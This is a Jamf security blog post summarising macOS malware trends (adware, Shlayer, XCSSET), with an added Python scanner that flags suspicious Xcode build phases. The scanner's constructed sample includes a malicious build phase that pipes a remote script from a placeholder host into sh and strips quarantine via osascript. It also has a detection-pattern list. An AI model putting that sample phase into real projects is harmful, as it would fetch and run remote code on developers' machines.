Jamf Blog
October 19, 2021 by Jesus Vigo

Discover the recent Mac malware trends threatening your organization

Jamf’s own Protect Detections Team presents a State of the Union of macOS malware: which families are the greatest concern, how they infect endpoints and what they do once installed. They also go over malware protection for Mac.

Adware Attacks! - Jaron Bradley

Adware is annoying, invasive and often buggy, introducing system instability and hogging system resources. But, according to Jaron, it also highlights a bigger concern: if malware authors can get adware running on a system without the user noticing, the same door is open to more damaging malware, such as spyware that compromises privacy and exfiltrates sensitive data. This makes enterprise malware protection a necessity, not an afterthought, for keeping Macs secure and data safe.

Delivery is often through sites hosting pirated software that poses as legitimate apps but is in reality nothing more than malware in disguise. Another popular delivery method is the fake Adobe Flash Player installer, which prompts users to download a "special version" of a plugin that Adobe discontinued at the end of 2020. Users who comply gain no plugin; they unknowingly install the malware on their Mac.

Rock out with Shlayer - Stuart Ashenbrener

Among “the most prevalent, resilient, ubiquitous families of malware that we’ve seen in the wild,” as Stuart puts it in the video, is Shlayer. For those not aware, Shlayer has been one of the focuses of Apple’s recent updates not only to macOS but also to its XProtect and MRT (Malware Removal Tool) security components, which protect macOS users against this family and against other, more nefarious malware that may operate in conjunction with it. He goes on to explain why this is especially concerning: Shlayer acts as a dropper, malware that serves as a vessel carrying other malware and/or scripts that further exploit a device, obtain user data and/or gather private information.

Have An XCSSET Strategy - Ferdous Saljooki

An example of malware that acts to compromise Apple security in order to collect confidential end-user data and sensitive PII/PHI is XCSSET. This particular piece of malware has also been on Apple’s radar, with a significant number of updates released recently to combat it on macOS devices. Among its repertoire of attacks, hijacking mouse clicks, keylogging and listening to or watching users through the microphone and camera are just a few of the noted capabilities. Of interest to developers, Ferdous explains how XCSSET was found spreading through infected GitHub repos and Xcode projects, with the aim of a supply-chain (pipeline) attack that infects more and more applications over time as developers build and share them. Its flexibility is further amplified by its use of AppleScript and many other modules to exfiltrate private data from files, going as far as to bypass Safari protections and TCC (CVE-2021-30713), among other macOS malware protections, to achieve its goal.
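Because XCSSET spreads by tampering with Xcode projects, one practical check for a developer or security team is to audit a project's `project.pbxproj` for shell-script build phases that fetch remote content, strip quarantine flags or invoke AppleScript at build time. The following is an added example, not code from the original post or from Jamf; it assumes the injected code takes the form of a `PBXShellScriptBuildPhase` entry (an assumption about the injection technique, not a statement of XCSSET's exact method), and the embedded pbxproj fragment is constructed for illustration.

```python
import os
import re
from dataclasses import dataclass

# Constructed sample fragment of an Xcode project.pbxproj (not a real infected
# project). The first phase is a benign linter invocation; the second is a
# hypothetical injected phase showing the indicators the scanner looks for.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4E5F60718293A4B5C /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/SwiftLint/swiftlint\"\n";
		};
		0F1E2D3C4B5A69788796A5B4 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/x.sh | sh &\nosascript -e 'do shell script \"xattr -d com.apple.quarantine /tmp/p\"'\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# A PBXShellScriptBuildPhase object: 24-hex-char object id, comment, then a
# brace-delimited body starting with "isa = PBXShellScriptBuildPhase;".
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]{24})\s*/\*[^*]*\*/\s*=\s*\{\s*isa\s*=\s*PBXShellScriptBuildPhase;'
    r'(?P<body>.*?)\n\s*\};',
    re.DOTALL,
)
NAME_RE = re.compile(r'\bname\s*=\s*"?([^";]+)"?\s*;')
# shellScript is a quoted string with backslash escapes (\n, \", \\).
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

# Behaviours that are unusual in a legitimate build phase and typical of a
# build-time dropper. Heuristic, not a signature.
INDICATORS = {
    "remote_fetch": re.compile(r'\b(curl|wget)\b'),
    "pipe_to_shell": re.compile(r'\|\s*(sh|bash|zsh)\b'),
    "applescript": re.compile(r'\bosascript\b'),
    "quarantine_strip": re.compile(r'\bxattr\s+(-d|-c)\b'),
    "decode_payload": re.compile(r'\bbase64\b.*(-d|--decode|-D)\b'),
    "eval": re.compile(r'\beval\b'),
    "tmp_write": re.compile(r'/(?:private/|var/)?tmp/'),
}


@dataclass
class Finding:
    phase_id: str
    name: str
    indicators: list
    script: str


def unescape(s):
    """Undo pbxproj string escapes so regexes see the real script text."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def scan_pbxproj(text):
    """Return one Finding per shell-script build phase in a pbxproj text."""
    findings = []
    for m in PHASE_RE.finditer(text):
        body = m.group('body')
        name_m = NAME_RE.search(body)
        script_m = SCRIPT_RE.search(body)
        script = unescape(script_m.group(1)) if script_m else ''
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(script))
        findings.append(Finding(m.group('id'), name_m.group(1) if name_m else '', hits, script))
    return findings


def suspicious(findings, min_hits=2):
    """Phases with at least min_hits indicators; two reduces noise from
    legitimate scripts that merely download a toolchain."""
    return [f for f in findings if len(f.indicators) >= min_hits]


def scan_project_tree(root):
    """Walk a checkout and scan every project.pbxproj found under it."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if 'project.pbxproj' in files:
            path = os.path.join(dirpath, 'project.pbxproj')
            with open(path, encoding='utf-8', errors='replace') as fh:
                results[path] = suspicious(scan_pbxproj(fh.read()))
    return results


if __name__ == "__main__":
    for f in suspicious(scan_pbxproj(SAMPLE_PBXPROJ)):
        print(f"{f.phase_id} ({f.name}): {', '.join(f.indicators)}")
```

Run against a cloned repository with `scan_project_tree(path)` before opening it in Xcode, since build phases execute as soon as the project is built; on real projects, review every flagged phase by hand rather than treating the indicator count as a verdict.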

Of course, this is just the tip of the iceberg. The team also discusses which malware types are most prevalent in the wild, how quickly authors have adapted their code to infect the new M1-based Apple computers, and deep dives into how key malware families infect endpoints and the mechanisms they leverage to maintain persistence.

Jamf Protect’s purpose-built endpoint security keeps your Mac, users and data safeguarded against all the threats mentioned above - and then some.

Contact us today to request a trial to start protecting your Apple fleet today.

Jesus Vigo
Jesus Vigo, Sr. Copywriter, Security.